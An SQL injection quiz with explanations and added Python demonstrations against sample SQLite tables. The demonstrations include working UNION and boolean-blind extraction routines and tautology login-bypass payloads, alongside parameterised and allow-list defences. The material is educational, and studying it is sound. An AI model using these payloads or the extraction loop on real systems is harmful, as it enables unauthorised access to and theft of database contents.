This set of SQL Multiple Choice Questions & Answers (MCQs) focuses on “SQL Injection”.
1. Which of the following is a technique in which a malicious code is inserted into strings that are passed to an SQL query?
a) SQL Malware
b) SQL Injection
c) SQL Hijack
d) SQL Trojan
View Answer
Explanation: SQL Injection is a technique in which malicious SQL is inserted into strings that are passed to an SQL query, so that the injected text is executed by the database and gives the attacker unauthorised access to the data (reading, modifying or deleting it).
2. Which of the following options best describes SQL Injection?
a) Web Hacking Technique
b) Database Hacking Technique
c) SQL Hacking Technique
d) Table Hacking Technique
View Answer
Explanation: SQL injection is one of the most common web hacking techniques. The attacker enters malicious input in a web page input field, which the application copies into a database query, to gain unauthorised access to the database.
3. Which of the following is a time-based SQL injection technique?
a) In-Band Injection
b) Error Based Injection
c) Union Based Injection
d) Time Based Blind Injection
View Answer
Explanation: Time-based blind injection relies on sending an SQL query that forces the database to wait for a specified number of seconds before responding; the attacker sees no data, only the delay, and infers the answer to a true/false question from it. In-band SQL injection occurs when an attacker is able to use the same communication channel to both launch the attack and gather results. Error-based is an in-band technique that relies on error messages thrown by the database. Union-based is an in-band technique that uses the UNION SQL operator to combine the results of two or more SELECT statements into a single result that comes back in the normal response.
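To make the in-band versus inferential distinction concrete, here is an added example (not part of the original quiz) written in Python against an in-memory SQLite database with constructed sample data. The search function is deliberately vulnerable (string concatenation). The union payload pulls another table's rows straight into the search response (in-band); the blind routine never sees the secret, only whether a row came back, and rebuilds it one character at a time (inferential). SQLite has no sleep function, so the blind variant shown is boolean-based; a time-based attack asks the same per-character question but reads the answer from a delay such as MySQL's SLEEP().

```python
import sqlite3

# Constructed sample database (not from the page): one table the attacker can
# see through the search feature, one table they are not supposed to reach.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'hunter2');
    """)
    return conn

def vulnerable_search(conn, term):
    """Deliberately vulnerable: the search term is concatenated into the query text."""
    sql = "SELECT name, price FROM products WHERE name = '" + term + "'"
    return conn.execute(sql).fetchall()

def union_attack(conn):
    """In-band (union-based): the stolen rows come back in the normal search response.
    The payload closes the string literal, appends a SELECT with the same number of
    columns, and comments out the quote the application adds at the end."""
    payload = "x' UNION SELECT username, password FROM users--"
    return vulnerable_search(conn, payload)

CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"

def boolean_blind_extract(conn, table, column, max_len=32):
    """Inferential (blind): the response never contains the secret, only 'row found'
    or 'no row'. Each probe asks whether one character of the secret equals a guess,
    and the secret is rebuilt from those yes/no answers."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            probe = ("widget' AND (SELECT substr(%s, %d, 1) FROM %s LIMIT 1) = '%s'--"
                     % (column, pos, table, ch))
            if vulnerable_search(conn, probe):   # a row came back: the guess was right
                recovered += ch
                break
        else:
            break   # no character matched: end of the secret
    return recovered

if __name__ == "__main__":
    db = make_db()
    print(union_attack(db))                               # [('admin', 'hunter2')]
    print(boolean_blind_extract(db, "users", "password"))  # hunter2
```

The blind routine needs seven probes per character on average over this charset, which is why blind extraction is slow and noisy in logs: a burst of near-identical requests differing only in a substr() offset and a guessed character is a reliable detection signature.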
4. Consider the following statements and tell which of them can be used for SQL injection.
a) SELECT * FROM table_name WHERE column_name = 105 NOT (1=1);
b) SELECT * FROM table_name WHERE column_name = 105 AND 1=1;
c) SELECT * FROM table_name WHERE column_name = 1=1;
d) SELECT * FROM table_name WHERE column_name = 16 OR 1=1;
View Answer
Explanation: The statement that can be used for SQL injection is –
SELECT * FROM TABLE_NAME WHERE column_name = 16 OR 1=1;
The above statement is valid and will return all rows from the table, since OR 1=1 is always true. Option b (AND 1=1) leaves the result of the original query unchanged; testers do inject AND 1=1 and AND 1=2 as a pair to detect an injection point by comparing the two responses, but on its own it does not alter what the query returns.
5. Consider the following statements and tell which of them can be used for SQL injection.
a) SELECT * FROM Students WHERE Id ="" and ""="" AND Password ="" and ""="";
b) SELECT * FROM Students WHERE Id ="" or ""="" AND Password ="" or ""="";
c) SELECT * FROM Students WHERE Id ="" not ""="" AND Password ="" not ""="";
d) SELECT * FROM Students WHERE Id ="" or ""="" AND Password ="";
View Answer
Explanation: The statement that can be used for SQL injection is –
SELECT * FROM Students WHERE Id ="" OR ""="" AND Password ="" OR ""="";
The above statement is valid and will return all rows from the Students table. Because AND binds more tightly than OR, it evaluates as Id = "" OR (""="" AND Password = "") OR ""="", and the trailing OR ""="" is always TRUE. Option d lacks that trailing term and therefore only matches rows whose Password is empty. Note that "" works as an empty string literal in MySQL; in standard SQL (and in SQLite and PostgreSQL) double quotes delimit identifiers, so the equivalent payload there uses single quotes (' OR ''=').
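The following is an added example (not from the original quiz) that runs the payloads from questions 4 and 5 against the Students query, using Python and an in-memory SQLite database with constructed rows. Single-quoted literals are used because SQLite treats double quotes as identifier delimiters. It shows the both-field tautology returning every row, the precedence trap behind option d of question 5 (injecting only the Id field leaves the AND in force), the OR 1=1 payload with a comment that discards the password check, and the same query with bound parameters, where the payload is just an Id that matches nothing.

```python
import sqlite3

# Constructed sample table (not from the page).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Students (Id TEXT, Password TEXT, Name TEXT);
        INSERT INTO Students VALUES ('s101', 'pw-alice', 'Alice'), ('s102', 'pw-bob', 'Bob');
    """)
    return conn

def login_vulnerable(conn, user_id, password):
    """Deliberately vulnerable: the quiz's WHERE clause built by string concatenation."""
    sql = ("SELECT Name FROM Students WHERE Id = '" + user_id +
           "' AND Password = '" + password + "'")
    return sorted(row[0] for row in conn.execute(sql))

def login_safe(conn, user_id, password):
    """Same query with bound parameters: the driver sends the values separately,
    so quotes and OR inside them are data, not SQL."""
    sql = "SELECT Name FROM Students WHERE Id = ? AND Password = ?"
    return sorted(row[0] for row in conn.execute(sql, (user_id, password)))

# Question 5, option b: closes the literal, adds an always-true term, reopens it.
TAUTOLOGY = "' OR ''='"
# Question 4 style: OR 1=1, then a comment swallows the rest of the statement.
COMMENT_OUT = "' OR 1=1--"

def demo():
    conn = make_db()
    return {
        # Id = '' OR ''='' AND Password = '' OR ''=''   -> every row
        "both_fields": login_vulnerable(conn, TAUTOLOGY, TAUTOLOGY),
        # Id = '' OR ''='' AND Password = 'wrong'       -> AND binds first, so no row;
        # this is the precedence that makes question 5, option d a weak payload
        "id_only": login_vulnerable(conn, TAUTOLOGY, "wrong"),
        # Id = '' OR 1=1--' AND Password = 'x'          -> every row, password ignored
        "comment_out": login_vulnerable(conn, COMMENT_OUT, "x"),
        # bound parameters: the payload is an Id that matches no row
        "parameterised": login_safe(conn, TAUTOLOGY, TAUTOLOGY),
        "valid_login": login_safe(conn, "s101", "pw-alice"),
    }

if __name__ == "__main__":
    for case, names in demo().items():
        print(case, names)
```

The "id_only" case is the practical reason attackers prefer a comment sequence (-- or #) over a second tautology: it does not depend on operator precedence or on controlling every field in the clause.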
6. In SQL, the parameters that can be used for protection from SQL injection are preceded by which symbol?
a) @
b) &
c) %
d) *
View Answer
Explanation: In T-SQL (SQL Server) and ADO.NET, the parameters used to protect against SQL injection are preceded by the @ symbol. Parameter values are supplied to the SQL query separately at execution time; the SQL engine checks that each value is valid for its column and treats it as data, never as part of the statement text to be executed. The prefix itself is a driver convention: other APIs use ? (JDBC, Python's sqlite3), :name (Oracle, sqlite3) or $1 (PostgreSQL), and the protection is the same as long as the value is bound rather than concatenated.
7. Java servlets are vulnerable to SQL injection.
a) True
b) False
View Answer
Explanation: Java servlets are also vulnerable to SQL injection if they build SQL queries dynamically by concatenating request parameters into the query string (typically via Statement). Using PreparedStatement with bound parameters removes the vulnerability; input validation on its own is a defence in depth, not a substitute.
8. Which of the following fields is susceptible to SQL injection?
a) Checklist
b) Radio Buttons
c) Input field
d) Lists
View Answer
Explanation: Any input field (Username, Password, Card Number, etc.) whose value is used in a WHERE clause to fetch data from the database is susceptible to SQL injection. In practice every client-supplied value, including radio button and list selections, hidden fields, cookies and HTTP headers, can be tampered with and must be treated as untrusted; free-text input fields are simply the most obvious entry point.
9. Which of the following statements demonstrates the correct way to use protection parameters in SQL?
a) SELECT * FROM Students WHERE Id = &0;
b) SELECT * FROM Students WHERE Id = *0;
c) SELECT * FROM Students WHERE Id = @0;
d) SELECT * FROM Students WHERE Id = %0;
View Answer
Explanation: The statement that demonstrates the correct way to use protection parameters in SQL is –
SELECT * FROM Students WHERE Id = @0;
Here @0 is a parameter placeholder. The value for it is supplied separately when the statement is executed and is bound as data, so whatever it contains is never parsed as part of the executable SQL statement.
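An added example (not from the original quiz) in Python with an in-memory SQLite database and constructed rows, going one step beyond the question: it shows a placeholder doing its job (sqlite3 spells it :id rather than @0, but the binding is the same), and then the limit practitioners run into, namely that placeholders bind values only. A table or column name supplied by the user cannot be parameterised; binding it turns it into a string constant, so the only safe option is an allow-list of identifiers.

```python
import sqlite3

# Constructed sample table (not from the page); rows are inserted out of name order
# so that the effect of ORDER BY is visible.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Students (Id TEXT, Name TEXT);
        INSERT INTO Students VALUES ('s102', 'Bob'), ('s101', 'Alice');
    """)
    return conn

def find_student(conn, student_id):
    """Placeholder syntax is a driver convention (@name in SQL Server/ADO.NET,
    ? or :name in sqlite3). The value is bound separately and never parsed as SQL,
    so an injection payload passed here is just an Id that matches nothing."""
    sql = "SELECT Name FROM Students WHERE Id = :id"
    return [row[0] for row in conn.execute(sql, {"id": student_id})]

ALLOWED_SORT_COLUMNS = {"Id", "Name"}

def safe_sort_column(requested):
    """Identifiers cannot be bound as parameters, so check them against an allow-list."""
    if requested not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unsupported sort column: %r" % requested)
    return requested

def list_students_bad_sort(conn, sort_col):
    """Common mistake: binding the column name. The bound value is a string constant,
    so ORDER BY orders by that constant (it does not sort by the column) and even a
    non-existent column name is accepted without error."""
    sql = "SELECT Name FROM Students ORDER BY ?"
    return [row[0] for row in conn.execute(sql, (sort_col,))]

def list_students_sorted(conn, sort_col):
    """Correct: only an allow-listed identifier is ever spliced into the statement."""
    sql = 'SELECT Name FROM Students ORDER BY "%s"' % safe_sort_column(sort_col)
    return [row[0] for row in conn.execute(sql)]

if __name__ == "__main__":
    db = make_db()
    print(find_student(db, "s101"))                   # ['Alice']
    print(find_student(db, "s101' OR '1'='1"))        # []
    print(list_students_bad_sort(db, "no_such_column"))
    print(list_students_sorted(db, "Name"))           # ['Alice', 'Bob']
```

The same rule applies to table names, LIMIT/OFFSET in some drivers, and anything else that is part of the statement's structure rather than a value: validate against a fixed set, never bind and never concatenate raw input.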
10. SQL injection attacks can be classified into how many categories?
a) 5
b) 4
c) 2
d) 3
View Answer
Explanation: Broadly, SQL injection attacks can be classified into three categories –
In-band SQL Injection – the attacker launches the attack and gathers the results via the same channel, for example union-based or error-based injection where the data appears in the application's response.
Inferential (blind) SQL Injection – no data is transferred via the web application's response, so the attacker cannot see the result directly and instead infers it from the application's behaviour, such as a true/false difference in the page or the response time.
Out-of-band SQL Injection – the data is sent directly from the database server to a machine controlled by the attacker over a different channel, typically DNS or HTTP requests issued by the database; this depends on the database having such features enabled.
Sanfoundry Global Education & Learning Series – SQL.